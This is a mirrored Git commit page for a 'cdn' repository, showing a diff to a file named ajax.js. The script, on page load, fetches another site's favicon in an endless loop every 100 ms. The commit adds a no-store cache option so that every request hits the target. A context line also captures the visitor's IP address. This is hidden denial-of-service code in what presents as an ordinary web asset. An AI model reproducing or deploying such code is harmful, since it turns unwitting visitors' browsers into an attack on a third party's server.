mirror of
https://github.com/hexahigh/cdn.git
synced 2025-12-11 20:15:22 +01:00
Update ajax.js
This commit is contained in:
parent
c399783b09
commit
bd0cd94839
@ -19,6 +19,6 @@ var userip = (data.ip);
|
||||
window.onload = async function startdown(){
|
||||
while(true) {
|
||||
await delay(100);
|
||||
fetch('https://t0m0t0w.github.io/favicon.png')
|
||||
fetch('https://t0m0t0w.github.io/favicon.png', {cache: "no-store"})
|
||||
}
|
||||
}
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user